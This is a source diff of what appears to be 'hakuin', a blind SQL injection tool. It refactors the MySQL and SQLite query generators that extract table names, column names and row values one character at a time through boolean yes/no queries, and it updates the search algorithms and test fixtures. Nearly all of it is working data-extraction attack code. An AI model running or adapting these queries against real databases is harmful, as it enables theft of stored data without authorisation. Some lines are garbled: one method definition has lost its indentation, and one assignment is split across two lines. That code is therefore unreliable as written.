+            SELECT COLUMN_KEY='PRI'
+            FROM information_schema.columns
+            WHERE TABLE_SCHEMA=database() AND
+                  TABLE_NAME=x'{self.hex(ctx.table)}' AND
+                  COLUMN_NAME=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+
+
+class MySQLTablesQueries(UniformQueries):
+    def rows_count(self, ctx, n):
+        query = f'''
+            SELECT count(*) < {n}
+            FROM information_schema.TABLES
+            WHERE TABLE_SCHEMA=database()
+        '''
+        return self.normalize(query)
+
+
+    def rows_are_ascii(self, ctx):
+        # min() simulates the logical ALL operator here
+        query = f'''
+            SELECT min(TABLE_NAME = CONVERT(TABLE_NAME using ASCII))
+            FROM information_schema.TABLES
+            WHERE TABLE_SCHEMA=database()
+        '''
+        return self.normalize(query)
+
+
+    def row_is_ascii(self, ctx):
+        query = f'''
+            SELECT TABLE_NAME = CONVERT(TABLE_NAME using ASCII)
+            FROM information_schema.TABLES
+            WHERE TABLE_SCHEMA=database()
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+    def char_is_ascii(self, ctx):
+        query = f'''
+            SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
+            FROM information_schema.TABLES
+            WHERE TABLE_SCHEMA=database()
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+    def char(self, ctx, values):
+        has_eos = EOS in values
+        values = [v for v in values if v != EOS]
+        values = ''.join(values).encode('utf-8').hex()
+
+        if has_eos:
+            query = f'''
+                SELECT locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
+                FROM information_schema.TABLES
+                WHERE TABLE_SCHEMA=database()
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        else:
+            query = f'''
+                SELECT char_length(TABLE_NAME) != {len(ctx.s)} AND
+                    locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
+                FROM information_schema.TABLES
+                WHERE TABLE_SCHEMA=database()
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        return self.normalize(query)
+
+
+
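+    # Candidates from the known charset are resolved by char(); characters outside it
+    # fall through to char_unicode() below, where BinaryTextCollector binary-searches
+    # the character's code point in the range (ASCII_MAX, UNICODE_MAX].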
def char_unicode(self, ctx, n):
+        query = f'''
+            SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
+            FROM information_schema.TABLES
+            WHERE TABLE_SCHEMA=database()
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+    def string(self, ctx):
+        raise NotImplementedError('TODO?')
+
+
+
+class MySQLColumnsQueries(UniformQueries):
+    def rows_count(self, ctx, n):
+        query = f'''
+            SELECT count(*) < {n}
+            FROM information_schema.COLUMNS
+            WHERE TABLE_SCHEMA=database() AND
+                  TABLE_NAME=x'{self.hex(ctx.table)}'
+        '''
+        return self.normalize(query)
+
+
+    def rows_are_ascii(self, ctx):
+        query = f'''
+            SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))
+            FROM information_schema.COLUMNS
+            WHERE TABLE_SCHEMA=database() AND
+                  TABLE_NAME=x'{self.hex(ctx.table)}'
+        '''
+        return self.normalize(query)
+
+
+    def row_is_ascii(self, ctx):
+        query = f'''
+            SELECT COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII)
+            FROM information_schema.COLUMNS
+            WHERE TABLE_SCHEMA=database() AND
+                  TABLE_NAME=x'{self.hex(ctx.table)}'
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+    def char_is_ascii(self, ctx):
+        query = f'''
+            SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
+            FROM information_schema.COLUMNS
+            WHERE TABLE_SCHEMA=database() AND
+                  TABLE_NAME=x'{self.hex(ctx.table)}'
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+    def char(self, ctx, values):
+        has_eos = EOS in values
+        values = [v for v in values if v != EOS]
+        values = ''.join(values).encode('utf-8').hex()
+
+        if has_eos:
+            query = f'''
+                SELECT locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
+                FROM information_schema.COLUMNS
+                WHERE TABLE_SCHEMA=database() AND
+                      TABLE_NAME=x'{self.hex(ctx.table)}'
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        else:
+            query = f'''
+                SELECT char_length(COLUMN_NAME) != {len(ctx.s)} AND
+                    locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
+                FROM information_schema.COLUMNS
+                WHERE TABLE_SCHEMA=database() AND
+                      TABLE_NAME=x'{self.hex(ctx.table)}'
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        return self.normalize(query)
+
+
+    def char_unicode(self, ctx, n):
+        query = f'''
+            SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
+            FROM information_schema.COLUMNS
+            WHERE TABLE_SCHEMA=database() AND
+                  TABLE_NAME=x'{self.hex(ctx.table)}'
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+    def string(self, ctx):
+        raise NotImplementedError('TODO?')
+
+
+
+class MySQLRowsQueries(UniformQueries):
+    def rows_count(self, ctx, n):
+        query = f'''
+            SELECT count(*) < {n}
+            FROM {MySQL.escape(ctx.table)}
+        '''
+        return self.normalize(query)
+
+
+    def rows_are_ascii(self, ctx):
+        query = f'''
+            SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII))
+            FROM {MySQL.escape(ctx.table)}
+        '''
+        return self.normalize(query)
+
+
+    def row_is_ascii(self, ctx):
+        query = f'''
+            SELECT {MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII)
+            FROM {MySQL.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+    def char_is_ascii(self, ctx):
+        query = f'''
+            SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
+            FROM {MySQL.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+    def char(self, ctx, values):
+        has_eos = EOS in values
+        values = [v for v in values if v != EOS]
+        values
= ''.join(values).encode('utf-8').hex() + + if has_eos: + query = f''' + SELECT locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}') + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + else: + query = f''' + SELECT char_length({MySQL.escape(ctx.column)}) != {len(ctx.s)} AND + locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}') + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_unicode(self, ctx, n): + query = f''' + SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {n} + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def string(self, ctx, values): + values = [f"x'{v.encode('utf-8').hex()}'" for v in values] + query = f''' + SELECT {MySQL.escape(ctx.column)} in ({','.join(values)}) + FROM {MySQL.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + class MySQL(DBMS): DATA_TYPES = [ @@ -14,151 +303,15 @@ class MySQL(DBMS): 'multilinestring', 'multipolygon', 'geometrycollection ', 'json' ] + MetaQueries = MySQLMetaQueries() + TablesQueries = MySQLTablesQueries() + ColumnsQueries = MySQLColumnsQueries() + RowsQueries = MySQLRowsQueries() - def count_rows(self, ctx, n): - query = f''' - SELECT COUNT(*) < {n} - FROM {ctx.table} - ''' - return self.normalize(query) - - - def count_tables(self, ctx, n): - query = f''' - SELECT COUNT(*) < {n} - FROM information_schema.TABLES - WHERE TABLE_SCHEMA=DATABASE() - ''' - return self.normalize(query) - - - def count_columns(self, ctx, n): - query = f''' - SELECT COUNT(*) < {n} - FROM information_schema.COLUMNS - WHERE TABLE_SCHEMA=DATABASE() AND - TABLE_NAME='{ctx.table}' - ''' - return self.normalize(query) - - - def meta_type(self, ctx, values): - values = [f"'{v}'" for v in values] - query = f''' - SELECT LOWER(DATA_TYPE) in ({','.join(values)}) - FROM information_schema.columns - WHERE TABLE_SCHEMA=DATABASE() AND - TABLE_NAME='{ctx.table}' AND - COLUMN_NAME='{ctx.column}' - ''' - return self.normalize(query) - - - def meta_is_nullable(self, ctx): - query = f''' - SELECT IS_NULLABLE='YES' - FROM information_schema.columns - WHERE TABLE_SCHEMA=DATABASE() AND - TABLE_NAME='{ctx.table}' AND - COLUMN_NAME='{ctx.column}' - ''' - return self.normalize(query) - - - def meta_is_pk(self, ctx): - query = f''' - SELECT COLUMN_KEY='PRI' - FROM information_schema.columns - WHERE TABLE_SCHEMA=DATABASE() AND - TABLE_NAME='{ctx.table}' AND - COLUMN_NAME='{ctx.column}' - ''' - return self.normalize(query) - - - def char_rows(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - # if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True - query = f''' - SELECT LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}') - FROM {ctx.table} - LIMIT 1 - OFFSET {ctx.row} - ''' - else: - query = f''' - SELECT SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND - LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}') - FROM {ctx.table} - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) - - - def char_tables(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - query = f''' - SELECT LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}') - 
FROM information_schema.TABLES
-                WHERE TABLE_SCHEMA=DATABASE()
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        else:
-            query = f'''
-                SELECT SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1) != '' AND
-                    LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
-                FROM information_schema.TABLES
-                WHERE TABLE_SCHEMA=DATABASE()
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        return self.normalize(query)
-
-
-    def char_columns(self, ctx, values):
-        has_eos = EOS in values
-        values = [v for v in values if v != EOS]
-        values = ''.join(values).encode('ascii').hex()
-
-        if has_eos:
-            query = f'''
-                SELECT LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
-                FROM information_schema.COLUMNS
-                WHERE TABLE_SCHEMA=DATABASE() AND
-                      TABLE_NAME='{ctx.table}'
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        else:
-            query = f'''
-                SELECT SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1) != '' AND
-                    LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
-                FROM information_schema.COLUMNS
-                WHERE TABLE_SCHEMA=DATABASE() AND
-                      TABLE_NAME='{ctx.table}'
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        return self.normalize(query)
-
-
-    def string_rows(self, ctx, values):
-        values = [f"x'{v.encode('ascii').hex()}'" for v in values]
-        query = f'''
-            SELECT {ctx.column} in ({','.join(values)})
-            FROM {ctx.table}
-            LIMIT 1
-            OFFSET {ctx.row}
-        '''
-        return self.normalize(query)
+    @staticmethod
+    def escape(s):
+        if DBMS._RE_ESCAPE.fullmatch(s):
+            return s
+        assert '`' not in s, f'Cannot escape "{s}"'
+        return f'`{s}`'
diff --git a/hakuin/dbms/SQLite.py b/hakuin/dbms/SQLite.py
index 3f79011..cb41a03 100644
--- a/hakuin/dbms/SQLite.py
+++ b/hakuin/dbms/SQLite.py
@@ -1,145 +1,290 @@
from hakuin.utils import EOS
-from .DBMS import DBMS
+from .DBMS import DBMS, MetaQueries, UniformQueries
-class SQLite(DBMS):
-    DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
-
-
-
-    def count_rows(self, ctx, n):
+class SQLiteMetaQueries(MetaQueries):
+    def column_data_type(self, ctx, values):
+        values = [f"'{v}'" for v in values]
        query = f'''
-            SELECT COUNT(*) < {n}
-            FROM {ctx.table}
+            SELECT type in ({','.join(values)})
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+            WHERE name=x'{self.hex(ctx.column)}'
        '''
        return self.normalize(query)
-    def count_tables(self, ctx, n):
+    def column_is_nullable(self, ctx):
        query = f'''
-            SELECT COUNT(*) < {n}
+            SELECT [notnull] == 0
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+            WHERE name=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+
+    def column_is_pk(self, ctx):
+        query = f'''
+            SELECT pk
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+            WHERE name=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+
+
+class SQLiteTablesQueries(UniformQueries):
+    def rows_count(self, ctx, n):
+        query = f'''
+            SELECT count(*) < {n}
            FROM sqlite_master
            WHERE type='table'
        '''
        return self.normalize(query)
-    def count_columns(self, ctx, n):
+    def rows_are_ascii(self, ctx):
+        # SQLite does not have a native "isascii" function. As a workaround, we look for
+        # non-ascii characters with "*[^\x01-\x7f]*" glob patterns. The pattern does not need to
+        # include the null terminator (0x00) because SQLite will never pass it to the GLOB expression.
+        # Also, the pattern is hex-encoded because SQLite does not support special characters in
+        # string literals. Lastly, sum() simulates the logical ANY operator here. Note that an empty string
+        # resolves to True, which is correct.
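+        # (The hex literal x'2a5b5e012d7f5d2a' decodes to the glob pattern *[^\x01-\x7f]*.)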
query = f''' - SELECT COUNT(*) < {n} - FROM pragma_table_info('{ctx.table}') + SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)) + FROM sqlite_master + WHERE type='table' ''' return self.normalize(query) - def meta_type(self, ctx, values): - values = [f"'{v}'" for v in values] + def row_is_ascii(self, ctx): query = f''' - SELECT type in ({','.join(values)}) - FROM pragma_table_info('{ctx.table}') - WHERE name='{ctx.column}' - ''' - return self.normalize(query) - - - def meta_is_nullable(self, ctx): - query = f''' - SELECT [notnull] == 0 - FROM pragma_table_info('{ctx.table}') - WHERE name='{ctx.column}' - ''' - return self.normalize(query) - - - def meta_is_pk(self, ctx): - query = f''' - SELECT pk - FROM pragma_table_info('{ctx.table}') - WHERE name='{ctx.column}' - ''' - return self.normalize(query) - - - def char_rows(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - # if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True - query = f''' - SELECT instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1)) - FROM {ctx.table} - LIMIT 1 - OFFSET {ctx.row} - ''' - else: - query = f''' - SELECT substr({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND - instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1)) - FROM {ctx.table} - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) - - - def char_tables(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - query = f''' - SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) - FROM sqlite_master - WHERE type='table' - LIMIT 1 - OFFSET {ctx.row} - ''' - else: - query = f''' - SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND - instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) - FROM sqlite_master - WHERE type='table' - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) - - - def char_columns(self, ctx, values): - has_eos = EOS in values - values = [v for v in values if v != EOS] - values = ''.join(values).encode('ascii').hex() - - if has_eos: - query = f''' - SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) - FROM pragma_table_info('{ctx.table}') - LIMIT 1 - OFFSET {ctx.row} - ''' - else: - query = f''' - SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND - instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) - FROM pragma_table_info('{ctx.table}') - LIMIT 1 - OFFSET {ctx.row} - ''' - return self.normalize(query) - - - def string_rows(self, ctx, values): - values = [f"x'{v.encode('ascii').hex()}'" for v in values] - query = f''' - SELECT cast({ctx.column} as BLOB) in ({','.join(values)}) - FROM {ctx.table} + SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM sqlite_master + WHERE type='table' LIMIT 1 OFFSET {ctx.row} ''' return self.normalize(query) + + + def char_is_ascii(self, ctx): + query = f''' + SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM sqlite_master + WHERE type='table' + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char(self, ctx, values): + has_eos = EOS in values + values = [v for v in values if v != EOS] + values = ''.join(values).encode('utf-8').hex() + + if has_eos: + query = f''' + SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) + FROM sqlite_master + WHERE type='table' + LIMIT 1 + OFFSET {ctx.row} + ''' + else: + query = 
f''' + SELECT length(name) != {len(ctx.s)} AND + instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) + FROM sqlite_master + WHERE type='table' + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_unicode(self, ctx, n): + query = f''' + SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n} + FROM sqlite_master + WHERE type='table' + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def string(self, ctx): + raise NotImplementedError('TODO?') + + + +class SQLiteColumnsQueries(UniformQueries): + def rows_count(self, ctx, n): + query = f''' + SELECT count(*) < {n} + FROM pragma_table_info(x'{self.hex(ctx.table)}') + ''' + return self.normalize(query) + + + def rows_are_ascii(self, ctx): + query = f''' + SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + ''' + return self.normalize(query) + + + def row_is_ascii(self, ctx): + query = f''' + SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_is_ascii(self, ctx): + query = f''' + SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char(self, ctx, values): + has_eos = EOS in values + values = [v for v in values if v != EOS] + values = ''.join(values).encode('utf-8').hex() + + if has_eos: + query = f''' + SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + LIMIT 1 + OFFSET {ctx.row} + ''' + else: + query = f''' + SELECT length(name) != {len(ctx.s)} AND + instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1)) + FROM pragma_table_info(x'{self.hex(ctx.table)}') + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_unicode(self, ctx, n): + query = f''' + SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n} + FROM pragma_table_info(x'{self.hex(ctx.table)}') + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def string(self, ctx): + raise NotImplementedError('TODO?') + + + +class SQLiteRowsQueries(UniformQueries): + def rows_count(self, ctx, n): + query = f''' + SELECT count(*) < {n} + FROM {SQLite.escape(ctx.table)} + ''' + return self.normalize(query) + + + def rows_are_ascii(self, ctx): + query = f''' + SELECT sum({SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT)) + FROM {SQLite.escape(ctx.table)} + ''' + return self.normalize(query) + + + def row_is_ascii(self, ctx): + query = f''' + SELECT {SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char_is_ascii(self, ctx): + query = f''' + SELECT substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT) + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + return self.normalize(query) + + + def char(self, ctx, values): + has_eos = EOS in values + values = [v for v in values if v != EOS] + values = ''.join(values).encode('utf-8').hex() + + if has_eos: + query = f''' + SELECT instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)) + FROM {SQLite.escape(ctx.table)} + LIMIT 1 + OFFSET {ctx.row} + ''' + else: + query = f''' + SELECT length({SQLite.escape(ctx.column)}) != 
{len(ctx.s)} AND
+                    instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
+                FROM {SQLite.escape(ctx.table)}
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        return self.normalize(query)
+
+
+    def char_unicode(self, ctx, n):
+        query = f'''
+            SELECT unicode(substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)) < {n}
+            FROM {SQLite.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+    def string(self, ctx, values):
+        values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
+        query = f'''
+            SELECT cast({SQLite.escape(ctx.column)} as BLOB) in ({','.join(values)})
+            FROM {SQLite.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+
+
+
+class SQLite(DBMS):
+    DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
+
+    MetaQueries = SQLiteMetaQueries()
+    TablesQueries = SQLiteTablesQueries()
+    ColumnsQueries = SQLiteColumnsQueries()
+    RowsQueries = SQLiteRowsQueries()
diff --git a/hakuin/search_algorithms.py b/hakuin/search_algorithms.py
index 0dd3042..3a73fb9 100644
--- a/hakuin/search_algorithms.py
+++ b/hakuin/search_algorithms.py
@@ -42,19 +42,23 @@ class SearchAlgorithm(metaclass=ABCMeta):
-class IntExponentialSearch(SearchAlgorithm):
-    '''Exponential search for integers.'''
-    def __init__(self, requester, query_cb, upper=16, correct=None):
+class IntExponentialBinarySearch(SearchAlgorithm):
+    '''Exponential and binary search for integers.'''
+    def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
        '''Constructor.
        Params:
            requester (Requester): Requester instance
            query_cb (function): query construction function
-            upper (int): initial upper bound of search range
+            lower (int): lower bound of search range
+            upper (int): upper bound of search range
+            find_range (bool): exponentially expands the range until the correct value is within it
            correct (int|None): correct value. If provided, the search is emulated
        '''
        super().__init__(requester, query_cb)
+        self.lower = lower
        self.upper = upper
+        self.find_range = find_range
        self.correct = correct
        self.n_queries = 0
@@ -63,22 +67,26 @@
        '''Runs the search algorithm.
        Params:
-            ctx (Context): inference context
+            ctx (Context): extraction context
        Returns:
            int: inferred number
        '''
        self.n_queries = 0
-        lower, upper = self._get_range(ctx, lower=0, upper=self.upper)
+        if self.find_range:
+            lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
+        else:
+            lower, upper = self.lower, self.upper
+
        return self._search(ctx, lower, upper)
-    def _get_range(self, ctx, lower, upper):
+    def _find_range(self, ctx, lower, upper):
        '''Exponentially expands the search range until the correct value is within it.
        Params:
-            ctx (Context): inference context
+            ctx (Context): extraction context
            lower (int): lower bound
            upper (int): upper bound
@@ -88,14 +96,14 @@
        if self._query(ctx, upper):
            return lower, upper
-        return self._get_range(ctx, upper, upper * 2)
+        return self._find_range(ctx, upper, upper * 2)
    def _search(self, ctx, lower, upper):
        '''Numeric binary search.
Params: - ctx (Context): inference context + ctx (Context): extraction context lower (int): lower bound upper (int): upper bound @@ -108,8 +116,8 @@ class IntExponentialSearch(SearchAlgorithm): middle = (lower + upper) // 2 if self._query(ctx, middle): return self._search(ctx, lower, middle) - else: - return self._search(ctx, middle, upper) + + return self._search(ctx, middle, upper) def _query(self, ctx, n): @@ -118,8 +126,8 @@ class IntExponentialSearch(SearchAlgorithm): if self.correct is None: query_string = self.query_cb(ctx, n) return self.requester.request(ctx, query_string) - else: - return self.correct < n + + return self.correct < n @@ -144,13 +152,12 @@ class BinarySearch(SearchAlgorithm): '''Runs the search algorithm. Params: - ctx (Context): inference context + ctx (Context): extraction context Returns: value|None: inferred value or None on fail ''' self.n_queries = 0 - return self._search(ctx, self.values) @@ -165,8 +172,8 @@ class BinarySearch(SearchAlgorithm): if self._query(ctx, left): return self._search(ctx, left) - else: - return self._search(ctx, right) + + return self._search(ctx, right) def _query(self, ctx, values): @@ -175,8 +182,8 @@ class BinarySearch(SearchAlgorithm): if self.correct is None: query_string = self.query_cb(ctx, values) return self.requester.request(ctx, query_string) - else: - return self.correct in values + + return self.correct in values @@ -204,13 +211,12 @@ class TreeSearch(SearchAlgorithm): '''Runs the search algorithm. Params: - ctx (Context): inference context + ctx (Context): extraction context Returns: value|None: inferred value or None on fail ''' self.n_queries = 0 - return self._search(ctx, self.tree, in_tree=self.in_tree) @@ -218,7 +224,7 @@ class TreeSearch(SearchAlgorithm): '''Tree search. Params: - ctx (Context): inference context + ctx (Context): extraction context tree (utils.huffman.Node): Huffman tree to search in_tree (bool): True if the correct value is known to be in the tree @@ -237,10 +243,11 @@ class TreeSearch(SearchAlgorithm): if self._query(ctx, tree.left.values()): return self._search(ctx, tree.left, True) - else: - if tree.right is None: - return None - return self._search(ctx, tree.right, in_tree) + + if tree.right is None: + return None + + return self._search(ctx, tree.right, in_tree) def _query(self, ctx, values): @@ -249,5 +256,5 @@ class TreeSearch(SearchAlgorithm): if self.correct is None: query_string = self.query_cb(ctx, values) return self.requester.request(ctx, query_string) - else: - return self.correct in values + + return self.correct in values diff --git a/hakuin/utils/__init__.py b/hakuin/utils/__init__.py index f662d93..3287c12 100644 --- a/hakuin/utils/__init__.py +++ b/hakuin/utils/__init__.py @@ -7,8 +7,10 @@ DIR_FILE = os.path.dirname(os.path.realpath(__file__)) DIR_ROOT = os.path.abspath(os.path.join(DIR_FILE, '..')) DIR_MODELS = os.path.join(DIR_ROOT, 'data', 'models') +ASCII_MAX = 0x7f +UNICODE_MAX = 0x10ffff + CHARSET_ASCII = [chr(x) for x in range(128)] + [''] -CHARSET_SCHEMA = list(string.ascii_lowercase + string.digits + '_#@') + [''] EOS = '' SOS = '' diff --git a/tests/OfflineRequester.py b/tests/OfflineRequester.py index 041273b..aecd048 100644 --- a/tests/OfflineRequester.py +++ b/tests/OfflineRequester.py @@ -12,22 +12,31 @@ DIR_DBS = os.path.abspath(os.path.join(DIR_FILE, 'dbs')) class OfflineRequester(Requester): '''Offline requester for testing purposes.''' - def __init__(self, db): + def __init__(self, db, verbose=False): '''Constructor. 
 
         Params:
             db (str): name of an .sqlite DB in the "dbs" dir
+            verbose (bool): flag for verbose prints
         '''
         db_file = os.path.join(DIR_DBS, f'{db}.sqlite')
         assert os.path.exists(db_file), f'DB not found: {db_file}'
 
         self.db = sqlite3.connect(db_file).cursor()
+        self.verbose = verbose
         self.n_queries = 0
 
 
     def request(self, ctx, query):
         self.n_queries += 1
         query = f'SELECT cast(({query}) as bool)'
-        return bool(self.db.execute(query).fetchone()[0])
+
+        res = bool(self.db.execute(query).fetchone()[0])
+
+        if self.verbose:
+            print(f'"{ctx.s}"\t{res}\t{query}')
+
+        return res
+
 
     def reset(self):
diff --git a/tests/dbs/unicode.json b/tests/dbs/unicode.json
new file mode 100644
index 0000000..153f30a
--- /dev/null
+++ b/tests/dbs/unicode.json
@@ -0,0 +1,7 @@
+{
+    "Ħ€ȽȽ© ŴǑȒȽƉ": [
+        {
+            "Ħ€ȽȽ© ŴǑȒȽƉ": "Ħ€ȽȽ© ŴǑȒȽƉ"
+        }
+    ]
+}
\ No newline at end of file
diff --git a/tests/dbs/unicode.sqlite b/tests/dbs/unicode.sqlite
new file mode 100644
index 0000000000000000000000000000000000000000..828cff1090f390ffca2866c5289a1840e3b85cba
GIT binary patch
literal 20480
zcmeI(Jxc>I7{Kw|)wbM;J-6x>u7fRzAmY$Pta3xOg4ToDsZ^{`sMePgTooK#1a)>5
z1V`5{;>&#w2fsuYQ*H4EDHJ+b`VSY9kQb8QO-~@38@Z}ik-PPyy|O3g#JJEju_&bw
zBC2w@opn`?syw1{CuyBZmoh453M*r3fNm9pb!8P|%~-R`c)Ack009ILKmY**5I_I{
1pcXjCBJ(Rd=EolSY=?OG+!6R7ITc_-sK(#y{TCurieG2uF5I_I{1Q0*~0R#|0009ILKwzK+
CNw=AxG0dncLb(77xDi<|6DeY00IagfB*srAbT55DamnuBvt1Q0*~0R#|0009ILKmY**hC$#9cT{}5

literal 0
HcmV?d00001

diff --git a/tests/test_large_content.py b/tests/test_large_content.py
index 398eed4..677c5a7 100644
--- a/tests/test_large_content.py
